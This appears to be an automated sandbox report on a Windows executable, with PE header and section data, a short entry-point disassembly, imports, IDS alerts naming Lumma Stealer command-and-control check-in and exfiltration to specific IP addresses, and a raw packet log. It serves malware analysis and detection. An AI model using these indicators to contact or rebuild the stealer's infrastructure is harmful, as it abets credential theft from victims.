                                                                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........\.i.\.i.\.i..vj.Q.i..vl...i..vm.O.i...l.z.i...m.L.i...j.N.i..vh.Y.i.\.h...i...a.].i.....].i...k.].i.Rich\.i.........PE..L..
                                                                                                                                    Icon Hash:607afae2d0c4fc0c
                                                                                                                                    Entrypoint:0x60d340
                                                                                                                                    Entrypoint Section:.text
                                                                                                                                    Digitally signed:false
                                                                                                                                    Imagebase:0x400000
                                                                                                                                    Subsystem:windows gui
                                                                                                                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                    Time Stamp:0x67681E7C [Sun Dec 22 14:13:16 2024 UTC]
                                                                                                                                    TLS Callbacks:
                                                                                                                                    CLR (.Net) Version:
                                                                                                                                    OS Version Major:6
                                                                                                                                    OS Version Minor:0
                                                                                                                                    File Version Major:6
                                                                                                                                    File Version Minor:0
                                                                                                                                    Subsystem Version Major:6
                                                                                                                                    Subsystem Version Minor:0
                                                                                                                                    Import Hash:4159edb38142459c0d592c68fcfb12bb
                                                                                                                                    Instruction
                                                                                                                                    push ebp
                                                                                                                                    mov ebp, esp
                                                                                                                                    call 00007F0F9953161Dh
                                                                                                                                    pop ebp
                                                                                                                                    ret
                                                                                                                                    int3
                                                                                                                                    int3
                                                                                                                                    int3
                                                                                                                                    int3
                                                                                                                                    int3
                                                                                                                                    int3
                                                                                                                                    push ebp
                                                                                                                                    mov ebp, esp
                                                                                                                                    push 00000000h
                                                                                                                                    call dword ptr [0063F018h]
                                                                                                                                    mov eax, dword ptr [ebp+08h]
                                                                                                                                    push eax
                                                                                                                                    call dword ptr [0063F014h]
                                                                                                                                    push C0000409h
                                                                                                                                    call dword ptr [0063F01Ch]
                                                                                                                                    push eax
                                                                                                                                    call dword ptr [0063F020h]
                                                                                                                                    pop ebp
                                                                                                                                    ret
                                                                                                                                    int3
                                                                                                                                    int3
                                                                                                                                    int3
                                                                                                                                    int3
                                                                                                                                    int3
                                                                                                                                    int3
                                                                                                                                    int3
                                                                                                                                    push ebp
                                                                                                                                    mov ebp, esp
                                                                                                                                    sub esp, 00000324h
                                                                                                                                    push 00000017h
                                                                                                                                    call dword ptr [0063F024h]
                                                                                                                                    test eax, eax
                                                                                                                                    je 00007F0F99531919h
                                                                                                                                    mov ecx, 00000002h
                                                                                                                                    int 29h
                                                                                                                                    mov dword ptr [00650E50h], eax
                                                                                                                                    mov dword ptr [00650E4Ch], ecx
                                                                                                                                    mov dword ptr [00650E48h], edx
                                                                                                                                    mov dword ptr [00650E44h], ebx
                                                                                                                                    mov dword ptr [00650E40h], esi
                                                                                                                                    mov dword ptr [00650E3Ch], edi
                                                                                                                                    mov word ptr [00650E68h], ss
                                                                                                                                    mov word ptr [00650E5Ch], cs
                                                                                                                                    mov word ptr [00650E38h], ds
                                                                                                                                    mov word ptr [00650E34h], es
                                                                                                                                    mov word ptr [00650E30h], fs
                                                                                                                                    mov word ptr [00650E2Ch], gs
                                                                                                                                    pushfd
                                                                                                                                    pop dword ptr [00650E60h]
                                                                                                                                    mov eax, dword ptr [ebp+00h]
                                                                                                                                    mov dword ptr [00650E54h], eax
                                                                                                                                    mov eax, dword ptr [ebp+04h]
                                                                                                                                    mov dword ptr [00650E58h], eax
                                                                                                                                    lea eax, dword ptr [ebp+08h]
                                                                                                                                    mov dword ptr [00650E64h], eax
                                                                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x24db5c0x3c.rdata
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x2530000x6f81.rsrc
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x25a0000x3468.reloc
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x24cb1c0x54.rdata
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x24cb700x40.rdata
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x23f0000x138.rdata
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                    .text0x10000x23d40a0x23d6008a29a5aac1bc8e02579247cecc894011unknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                    .rdata0x23f0000xf2540xf4003ec7f432f0eb94a7cd4f45b0af0ddae9False0.32444287909836067data4.576652094150722IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                    .data0x24f0000x2e980x1e001989463e931412e158ee95057a52e60dFalse0.550390625data6.204475684569549IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                    .fptable0x2520000x800x200bf619eac0cdf3f68d496ea9344137e8bFalse0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                    .rsrc0x2530000x6f810x70008c9d2a0c40c5d5c1a365bf677f6461f7False0.45511300223214285data4.16373924956781IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                    .reloc0x25a0000x34680x3600b4bbc3782923e89727c07604a431143fFalse0.7822627314814815data6.69615621273849IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                    RT_ICON0x2536b80x1128Device independent bitmap graphic, 32 x 64 x 32, image size 43520.6675774134790529
                                                                                                                                    RT_MENU0x2547e00x2b2data0.5463768115942029
                                                                                                                                    RT_MENU0x254a940x2e0data0.5475543478260869
                                                                                                                                    RT_DIALOG0x254d740x280data0.5203125
                                                                                                                                    RT_DIALOG0x254ff40x3f8data0.5078740157480315
                                                                                                                                    RT_DIALOG0x2553ec0x434data0.5037174721189591
                                                                                                                                    RT_DIALOG0x2558200x2dcdata0.5505464480874317
                                                                                                                                    RT_DIALOG0x255afc0x2a0data0.5654761904761905
                                                                                                                                    RT_DIALOG0x255d9c0x5dcdata0.4866666666666667
                                                                                                                                    RT_DIALOG0x2563780x63cdata0.4730576441102757
                                                                                                                                    RT_DIALOG0x2569b40x410data0.5278846153846154
                                                                                                                                    RT_DIALOG0x256dc40x3a8data0.5438034188034188
                                                                                                                                    RT_DIALOG0x25716c0x52cdata0.5075528700906344
                                                                                                                                    RT_DIALOG0x2576980x4acdata0.4899665551839465
                                                                                                                                    RT_DIALOG0x257b440x38cdata0.5154185022026432
                                                                                                                                    RT_DIALOG0x257ed00x388data0.5221238938053098
                                                                                                                                    RT_DIALOG0x2582580x35cdata0.5209302325581395
                                                                                                                                    RT_DIALOG0x2585b40x39cdata0.5270562770562771
                                                                                                                                    RT_DIALOG0x2589500x3a4data0.5375536480686696
                                                                                                                                    RT_STRING0x258cf40x144data0.5987654320987654
                                                                                                                                    RT_STRING0x258e380x170data0.6141304347826086
                                                                                                                                    RT_STRING0x258fa80x184data0.6134020618556701
                                                                                                                                    RT_STRING0x25912c0x160data0.6136363636363636
                                                                                                                                    RT_STRING0x25928c0x1bcdata0.5833333333333334
                                                                                                                                    RT_STRING0x2594480x180data0.6119791666666666
                                                                                                                                    RT_STRING0x2595c80x16cdata0.5961538461538461
                                                                                                                                    RT_STRING0x2597340x194AmigaOS bitmap font "p", fc_YSize 25856, 25856 elements, 2nd "s", 3rd0.599009900990099
                                                                                                                                    RT_STRING0x2598c80x18cdata0.5959595959595959
                                                                                                                                    RT_STRING0x259a540xacdata0.6569767441860465
                                                                                                                                    RT_GROUP_ICON0x259b000x14data1.05
                                                                                                                                    RT_VERSION0x259b140x2f0SysEx File - IDP0.5079787234042553
                                                                                                                                    RT_MANIFEST0x259e040x17dXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5931758530183727
                                                                                                                                    DLLImport
                                                                                                                                    KERNEL32.dllVirtualProtect, WriteFile, CreateFileW, DecodePointer, GetConsoleMode, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, GetModuleHandleW, RtlUnwind, GetLastError, SetLastError, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, GetProcAddress, LoadLibraryExW, EncodePointer, RaiseException, GetStdHandle, GetModuleFileNameW, ExitProcess, GetModuleHandleExW, HeapAlloc, HeapValidate, GetSystemInfo, OutputDebugStringW, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, MultiByteToWideChar, WideCharToMultiByte, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetStdHandle, GetFileType, GetStringTypeW, FlsAlloc, FlsGetValue, FlsSetValue, FlsFree, InitializeCriticalSectionEx, LCMapStringW, GetProcessHeap, HeapFree, HeapReAlloc, HeapSize, HeapQueryInformation, WriteConsoleW, SetFilePointerEx, FlushFileBuffers, GetConsoleOutputCP, CloseHandle
                                                                                                                                    USER32.dllMessageBoxA, MessageBoxW
                                                                                                                                    Language of compilation systemCountry where language is spokenMap
                                                                                                                                    EnglishUnited States
                                                                                                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                    2025-01-01T16:53:57.048510+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549975172.67.219.133443TCP
                                                                                                                                    2025-01-01T16:53:57.543982+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.549975172.67.219.133443TCP
                                                                                                                                    2025-01-01T16:53:57.543982+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549975172.67.219.133443TCP
                                                                                                                                    2025-01-01T16:53:58.058458+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549976172.67.219.133443TCP
                                                                                                                                    2025-01-01T16:53:58.549335+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.549976172.67.219.133443TCP
                                                                                                                                    2025-01-01T16:53:58.549335+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549976172.67.219.133443TCP
                                                                                                                                    2025-01-01T16:53:59.321990+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549977172.67.219.133443TCP
                                                                                                                                    2025-01-01T16:54:00.998875+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549978172.67.219.133443TCP
                                                                                                                                    2025-01-01T16:54:02.394749+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549979172.67.219.133443TCP
                                                                                                                                    2025-01-01T16:54:04.150189+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549980172.67.219.133443TCP
                                                                                                                                    2025-01-01T16:54:04.600845+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.549980172.67.219.133443TCP
                                                                                                                                    2025-01-01T16:54:05.523949+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549981172.67.219.133443TCP
                                                                                                                                    2025-01-01T16:54:07.689652+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549982172.67.219.133443TCP
                                                                                                                                    2025-01-01T16:54:08.175148+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549982172.67.219.133443TCP
                                                                                                                                    2025-01-01T16:54:08.712519+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549983188.114.97.3443TCP
                                                                                                                                    2025-01-01T16:54:09.113380+01002008438ET MALWARE Possible Windows executable sent when remote host claims to send a Text File1188.114.97.3443192.168.2.549983TCP
                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                    Jan 1, 2025 16:53:56.581577063 CET49975443192.168.2.5172.67.219.133
                                                                                                                                    Jan 1, 2025 16:53:56.581629038 CET44349975172.67.219.133192.168.2.5
                                                                                                                                    Jan 1, 2025 16:53:56.581727028 CET49975443192.168.2.5172.67.219.133
                                                                                                                                    Jan 1, 2025 16:53:56.583020926 CET49975443192.168.2.5172.67.219.133
                                                                                                                                    Jan 1, 2025 16:53:56.583031893 CET44349975172.67.219.133192.168.2.5
                                                                                                                                    Jan 1, 2025 16:53:57.048378944 CET44349975172.67.219.133192.168.2.5
                                                                                                                                    Jan 1, 2025 16:53:57.048510075 CET49975443192.168.2.5172.67.219.133
                                                                                                                                    Jan 1, 2025 16:53:57.051269054 CET49975443192.168.2.5172.67.219.133
                                                                                                                                    Jan 1, 2025 16:53:57.051276922 CET44349975172.67.219.133192.168.2.5
                                                                                                                                    Jan 1, 2025 16:53:57.051522017 CET44349975172.67.219.133192.168.2.5
                                                                                                                                    Jan 1, 2025 16:53:57.103854895 CET49975443192.168.2.5172.67.219.133
                                                                                                                                    Jan 1, 2025 16:53:57.130275965 CET49975443192.168.2.5172.67.219.133
                                                                                                                                    Jan 1, 2025 16:53:57.130297899 CET49975443192.168.2.5172.67.219.133
                                                                                                                                    Jan 1, 2025 16:53:57.130422115 CET44349975172.67.219.133192.168.2.5
                                                                                                                                    Jan 1, 2025 16:53:57.543997049 CET44349975172.67.219.133192.168.2.5
                                                                                                                                    Jan 1, 2025 16:53:57.544104099 CET44349975172.67.219.133192.168.2.5
                                                                                                                                    Jan 1, 2025 16:53:57.544166088 CET49975443192.168.2.5172.67.219.133
                                                                                                                                    Jan 1, 2025 16:53:57.546833992 CET49975443192.168.2.5172.67.219.133
                                                                                                                                    Jan 1, 2025 16:53:57.546857119 CET44349975172.67.219.133192.168.2.5
                                                                                                                                    Jan 1, 2025 16:53:57.546901941 CET49975443192.168.2.5172.67.219.133
                                                                                                                                    Jan 1, 2025 16:53:57.546907902 CET44349975172.67.219.133192.168.2.5
                                                                                                                                    Jan 1, 2025 16:53:57.560827971 CET49976443192.168.2.5172.67.219.133
                                                                                                                                    Jan 1, 2025 16:53:57.560888052 CET44349976172.67.219.133192.168.2.5
                                                                                                                                    Jan 1, 2025 16:53:57.560972929 CET49976443192.168.2.5172.67.219.133
                                                                                                                                    Jan 1, 2025 16:53:57.561258078 CET49976443192.168.2.5172.67.219.133
                                                                                                                                    Jan 1, 2025 16:53:57.561271906 CET44349976172.67.219.133192.168.2.5
                                                                                                                                    Jan 1, 2025 16:53:58.058372021 CET44349976172.67.219.133192.168.2.5
                                                                                                                                    Jan 1, 2025 16:53:58.058458090 CET49976443192.168.2.5172.67.219.133
                                                                                                                                    Jan 1, 2025 16:53:58.059672117 CET49976443192.168.2.5172.67.219.133
                                                                                                                                    Jan 1, 2025 16:53:58.059684038 CET44349976172.67.219.133192.168.2.5
                                                                                                                                    Jan 1, 2025 16:53:58.059942961 CET44349976172.67.219.133192.168.2.5
                                                                                                                                    Jan 1, 2025 16:53:58.061161995 CET49976443192.168.2.5172.67.219.133
                                                                                                                                    Jan 1, 2025 16:53:58.061193943 CET49976443192.168.2.5172.67.219.133
                                                                                                                                    Jan 1, 2025 16:53:58.061229944 CET44349976172.67.219.133192.168.2.5
                                                                                                                                    Jan 1, 2025 16:53:58.549318075 CET44349976172.67.219.133192.168.2.5
                                                                                                                                    Jan 1, 2025 16:53:58.549369097 CET44349976172.67.219.133192.168.2.5
                                                                                                                                    Jan 1, 2025 16:53:58.549407959 CET44349976172.67.219.133192.168.2.5
                                                                                                                                    Jan 1, 2025 16:53:58.549433947 CET49976443192.168.2.5172.67.219.133
                                                                                                                                    Jan 1, 2025 16:53:58.549439907 CET44349976172.67.219.133192.168.2.5
                                                                                                                                    Jan 1, 2025 16:53:58.549475908 CET44349976172.67.219.133192.168.2.5
                                                                                                                                    Jan 1, 2025 16:53:58.549499989 CET49976443192.168.2.5172.67.219.133
                                                                                                                                    Jan 1, 2025 16:53:58.549523115 CET44349976172.67.219.133192.168.2.5
                                                                                                                                    Jan 1, 2025 16:53:58.549556971 CET44349976172.67.219.133192.168.2.5
                                                                                                                                    Jan 1, 2025 16:53:58.549576044 CET49976443192.168.2.5172.67.219.133
                                                                                                                                    Jan 1, 2025 16:53:58.549581051 CET44349976172.67.219.133192.168.2.5
                                                                                                                                    Jan 1, 2025 16:53:58.549623013 CET49976443192.168.2.5172.67.219.133
                                                                                                                                    Jan 1, 2025 16:53:58.549906969 CET44349976172.67.219.133192.168.2.5
                                                                                                                                    Jan 1, 2025 16:53:58.550259113 CET44349976172.67.219.133192.168.2.5
                                                                                                                                    Jan 1, 2025 16:53:58.550307035 CET49976443192.168.2.5172.67.219.133
                                                                                                                                    Jan 1, 2025 16:53:58.550312996 CET44349976172.67.219.133192.168.2.5
                                                                                                                                    Jan 1, 2025 16:53:58.554089069 CET44349976172.67.219.133192.168.2.5
                                                                                                                                    Jan 1, 2025 16:53:58.554136038 CET49976443192.168.2.5172.67.219.133
                                                                                                                                    Jan 1, 2025 16:53:58.554141998 CET44349976172.67.219.133192.168.2.5
                                                                                                                                    Jan 1, 2025 16:53:58.603851080 CET49976443192.168.2.5172.67.219.133
                                                                                                                                    Jan 1, 2025 16:53:58.641575098 CET44349976172.67.219.133192.168.2.5
                                                                                                                                    Jan 1, 2025 16:53:58.641711950 CET44349976172.67.219.133192.168.2.5
                                                                                                                                    Jan 1, 2025 16:53:58.641735077 CET44349976172.67.219.133192.168.2.5
                                                                                                                                    Jan 1, 2025 16:53:58.641760111 CET49976443192.168.2.5172.67.219.133
                                                                                                                                    Jan 1, 2025 16:53:58.641767979 CET44349976172.67.219.133192.168.2.5
                                                                                                                                    Jan 1, 2025 16:53:58.641823053 CET49976443192.168.2.5172.67.219.133
                                                                                                                                    Jan 1, 2025 16:53:58.641828060 CET44349976172.67.219.133192.168.2.5
                                                                                                                                    Jan 1, 2025 16:53:58.641840935 CET44349976172.67.219.133192.168.2.5
                                                                                                                                    Jan 1, 2025 16:53:58.641892910 CET49976443192.168.2.5172.67.219.133
                                                                                                                                    Jan 1, 2025 16:53:58.642086983 CET49976443192.168.2.5172.67.219.133
                                                                                                                                    Jan 1, 2025 16:53:58.642102003 CET44349976172.67.219.133192.168.2.5
                                                                                                                                    Jan 1, 2025 16:53:58.642112017 CET49976443192.168.2.5172.67.219.133
                                                                                                                                    Jan 1, 2025 16:53:58.642117023 CET44349976172.67.219.133192.168.2.5
                                                                                                                                    Jan 1, 2025 16:53:58.842051983 CET49977443192.168.2.5172.67.219.133
                                                                                                                                    Jan 1, 2025 16:53:58.842087030 CET44349977172.67.219.133192.168.2.5
                                                                                                                                    Jan 1, 2025 16:53:58.842305899 CET49977443192.168.2.5172.67.219.133
                                                                                                                                    Jan 1, 2025 16:53:58.842622995 CET49977443192.168.2.5172.67.219.133
                                                                                                                                    Jan 1, 2025 16:53:58.842633963 CET44349977172.67.219.133192.168.2.5
                                                                                                                                    Jan 1, 2025 16:53:59.321845055 CET44349977172.67.219.133192.168.2.5
                                                                                                                                    Jan 1, 2025 16:53:59.321990013 CET49977443192.168.2.5172.67.219.133
                                                                                                                                    Jan 1, 2025 16:53:59.323334932 CET49977443192.168.2.5172.67.219.133
                                                                                                                                    Jan 1, 2025 16:53:59.323343039 CET44349977172.67.219.133192.168.2.5
                                                                                                                                    Jan 1, 2025 16:53:59.323579073 CET44349977172.67.219.133192.168.2.5
                                                                                                                                    Jan 1, 2025 16:53:59.324834108 CET49977443192.168.2.5172.67.219.133
                                                                                                                                    Jan 1, 2025 16:53:59.324997902 CET49977443192.168.2.5172.67.219.133
                                                                                                                                    Jan 1, 2025 16:53:59.325069904 CET44349977172.67.219.133192.168.2.5
                                                                                                                                    Jan 1, 2025 16:54:00.357475996 CET44349977172.67.219.133192.168.2.5
                                                                                                                                    Jan 1, 2025 16:54:00.357637882 CET44349977172.67.219.133192.168.2.5
                                                                                                                                    Jan 1, 2025 16:54:00.357714891 CET49977443192.168.2.5172.67.219.133
                                                                                                                                    Jan 1, 2025 16:54:00.357893944 CET49977443192.168.2.5172.67.219.133
                                                                                                                                    Jan 1, 2025 16:54:00.357914925 CET44349977172.67.219.133192.168.2.5
                                                                                                                                    Jan 1, 2025 16:54:00.479813099 CET49978443192.168.2.5172.67.219.133
                                                                                                                                    Jan 1, 2025 16:54:00.479866028 CET44349978172.67.219.133192.168.2.5
                                                                                                                                    Jan 1, 2025 16:54:00.479943037 CET49978443192.168.2.5172.67.219.133
                                                                                                                                    Jan 1, 2025 16:54:00.480245113 CET49978443192.168.2.5172.67.219.133
                                                                                                                                    Jan 1, 2025 16:54:00.480256081 CET44349978172.67.219.133192.168.2.5
                                                                                                                                    Jan 1, 2025 16:54:00.998765945 CET44349978172.67.219.133192.168.2.5
                                                                                                                                    Jan 1, 2025 16:54:00.998874903 CET49978443192.168.2.5172.67.219.133
                                                                                                                                    Jan 1, 2025 16:54:01.000071049 CET49978443192.168.2.5172.67.219.133
                                                                                                                                    Jan 1, 2025 16:54:01.000081062 CET44349978172.67.219.133192.168.2.5
                                                                                                                                    Jan 1, 2025 16:54:01.000323057 CET44349978172.67.219.133192.168.2.5
                                                                                                                                    Jan 1, 2025 16:54:01.003767014 CET49978443192.168.2.5172.67.219.133
                                                                                                                                    Jan 1, 2025 16:54:01.003863096 CET49978443192.168.2.5172.67.219.133
                                                                                                                                    Jan 1, 2025 16:54:01.003895998 CET44349978172.67.219.133192.168.2.5
                                                                                                                                    Jan 1, 2025 16:54:01.004096985 CET49978443192.168.2.5172.67.219.133
                                                                                                                                    Jan 1, 2025 16:54:01.047333956 CET44349978172.67.219.133192.168.2.5
                                                                                                                                    Jan 1, 2025 16:54:01.696732044 CET44349978172.67.219.133192.168.2.5
                                                                                                                                    Jan 1, 2025 16:54:01.696849108 CET44349978172.67.219.133192.168.2.5
                                                                                                                                    Jan 1, 2025 16:54:01.697000980 CET49978443192.168.2.5172.67.219.133
                                                                                                                                    Jan 1, 2025 16:54:01.697074890 CET49978443192.168.2.5172.67.219.133
                                                                                                                                    Jan 1, 2025 16:54:01.697096109 CET44349978172.67.219.133192.168.2.5
                                                                                                                                    Jan 1, 2025 16:54:01.907211065 CET49979443192.168.2.5172.67.219.133
                                                                                                                                    Jan 1, 2025 16:54:01.907257080 CET44349979172.67.219.133192.168.2.5
                                                                                                                                    Jan 1, 2025 16:54:01.907330036 CET49979443192.168.2.5172.67.219.133
                                                                                                                                    Jan 1, 2025 16:54:01.907665968 CET49979443192.168.2.5172.67.219.133
                                                                                                                                    Jan 1, 2025 16:54:01.907680988 CET44349979172.67.219.133192.168.2.5
                                                                                                                                    Jan 1, 2025 16:54:02.394669056 CET44349979172.67.219.133192.168.2.5
                                                                                                                                    Jan 1, 2025 16:54:02.394748926 CET49979443192.168.2.5172.67.219.133
                                                                                                                                    Jan 1, 2025 16:54:02.397950888 CET49979443192.168.2.5172.67.219.133
                                                                                                                                    Jan 1, 2025 16:54:02.397964001 CET44349979172.67.219.133192.168.2.5
                                                                                                                                    Jan 1, 2025 16:54:02.398623943 CET44349979172.67.219.133192.168.2.5
                                                                                                                                    Jan 1, 2025 16:54:02.402013063 CET49979443192.168.2.5172.67.219.133
                                                                                                                                    Jan 1, 2025 16:54:02.402128935 CET49979443192.168.2.5172.67.219.133
                                                                                                                                    Jan 1, 2025 16:54:02.402170897 CET44349979172.67.219.133192.168.2.5
                                                                                                                                    Jan 1, 2025 16:54:02.402235031 CET49979443192.168.2.5172.67.219.133
                                                                                                                                    Jan 1, 2025 16:54:02.402244091 CET44349979172.67.219.133192.168.2.5
                                                                                                                                    Jan 1, 2025 16:54:03.042284012 CET44349979172.67.219.133192.168.2.5
                                                                                                                                    Jan 1, 2025 16:54:03.042377949 CET44349979172.67.219.133192.168.2.5
                                                                                                                                    Jan 1, 2025 16:54:03.042431116 CET49979443192.168.2.5172.67.219.133
                                                                                                                                    Jan 1, 2025 16:54:03.049680948 CET49979443192.168.2.5172.67.219.133
                                                                                                                                    Jan 1, 2025 16:54:03.049694061 CET44349979172.67.219.133192.168.2.5
                                                                                                                                    Jan 1, 2025 16:54:03.661529064 CET49980443192.168.2.5172.67.219.133
                                                                                                                                    Jan 1, 2025 16:54:03.661576986 CET44349980172.67.219.133192.168.2.5
                                                                                                                                    Jan 1, 2025 16:54:03.661648989 CET49980443192.168.2.5172.67.219.133
                                                                                                                                    Jan 1, 2025 16:54:03.661964893 CET49980443192.168.2.5172.67.219.133
                                                                                                                                    Jan 1, 2025 16:54:03.661981106 CET44349980172.67.219.133192.168.2.5
                                                                                                                                    Jan 1, 2025 16:54:04.150114059 CET44349980172.67.219.133192.168.2.5
                                                                                                                                    Jan 1, 2025 16:54:04.150188923 CET49980443192.168.2.5172.67.219.133
                                                                                                                                    Jan 1, 2025 16:54:04.151606083 CET49980443192.168.2.5172.67.219.133
                                                                                                                                    Jan 1, 2025 16:54:04.151612997 CET44349980172.67.219.133192.168.2.5
                                                                                                                                    Jan 1, 2025 16:54:04.151845932 CET44349980172.67.219.133192.168.2.5
                                                                                                                                    Jan 1, 2025 16:54:04.153749943 CET49980443192.168.2.5172.67.219.133
                                                                                                                                    Jan 1, 2025 16:54:04.153836966 CET49980443192.168.2.5172.67.219.133
                                                                                                                                    Jan 1, 2025 16:54:04.153844118 CET44349980172.67.219.133192.168.2.5
                                                                                                                                    Jan 1, 2025 16:54:04.600857973 CET44349980172.67.219.133192.168.2.5
                                                                                                                                    Jan 1, 2025 16:54:04.600958109 CET44349980172.67.219.133192.168.2.5
                                                                                                                                    Jan 1, 2025 16:54:04.601023912 CET49980443192.168.2.5172.67.219.133
                                                                                                                                    Jan 1, 2025 16:54:04.601174116 CET49980443192.168.2.5172.67.219.133
                                                                                                                                    Jan 1, 2025 16:54:04.601193905 CET44349980172.67.219.133192.168.2.5
                                                                                                                                    Jan 1, 2025 16:54:05.046914101 CET49981443192.168.2.5172.67.219.133
                                                                                                                                    Jan 1, 2025 16:54:05.046977997 CET44349981172.67.219.133192.168.2.5
                                                                                                                                    Jan 1, 2025 16:54:05.047045946 CET49981443192.168.2.5172.67.219.133
                                                                                                                                    Jan 1, 2025 16:54:05.047339916 CET49981443192.168.2.5172.67.219.133
                                                                                                                                    Jan 1, 2025 16:54:05.047353983 CET44349981172.67.219.133192.168.2.5
                                                                                                                                    Jan 1, 2025 16:54:05.523829937 CET44349981172.67.219.133192.168.2.5
                                                                                                                                    Jan 1, 2025 16:54:05.523948908 CET49981443192.168.2.5172.67.219.133
                                                                                                                                    Jan 1, 2025 16:54:05.533010006 CET49981443192.168.2.5172.67.219.133
                                                                                                                                    Jan 1, 2025 16:54:05.533019066 CET44349981172.67.219.133192.168.2.5
                                                                                                                                    Jan 1, 2025 16:54:05.533261061 CET44349981172.67.219.133192.168.2.5
                                                                                                                                    Jan 1, 2025 16:54:05.537550926 CET49981443192.168.2.5172.67.219.133
                                                                                                                                    Jan 1, 2025 16:54:05.545284033 CET49981443192.168.2.5172.67.219.133
                                                                                                                                    Jan 1, 2025 16:54:05.545312881 CET44349981172.67.219.133192.168.2.5
                                                                                                                                    Jan 1, 2025 16:54:05.545429945 CET49981443192.168.2.5172.67.219.133
                                                                                                                                    Jan 1, 2025 16:54:05.545459986 CET44349981172.67.219.133192.168.2.5
                                                                                                                                    Jan 1, 2025 16:54:05.545564890 CET49981443192.168.2.5172.67.219.133
                                                                                                                                    Jan 1, 2025 16:54:05.545615911 CET44349981172.67.219.133192.168.2.5
                                                                                                                                    Jan 1, 2025 16:54:05.545721054 CET49981443192.168.2.5172.67.219.133
                                                                                                                                    Jan 1, 2025 16:54:05.545742989 CET44349981172.67.219.133192.168.2.5
                                                                                                                                    Jan 1, 2025 16:54:05.545866966 CET49981443192.168.2.5172.67.219.133
                                                                                                                                    Jan 1, 2025 16:54:05.545895100 CET44349981172.67.219.133192.168.2.5
                                                                                                                                    Jan 1, 2025 16:54:05.546020985 CET49981443192.168.2.5172.67.219.133
                                                                                                                                    Jan 1, 2025 16:54:05.546037912 CET44349981172.67.219.133192.168.2.5
                                                                                                                                    Jan 1, 2025 16:54:05.546050072 CET49981443192.168.2.5172.67.219.133
                                                                                                                                    Jan 1, 2025 16:54:05.546061039 CET44349981172.67.219.133192.168.2.5
                                                                                                                                    Jan 1, 2025 16:54:05.546186924 CET49981443192.168.2.5172.67.219.133
                                                                                                                                    Jan 1, 2025 16:54:05.546211004 CET44349981172.67.219.133192.168.2.5
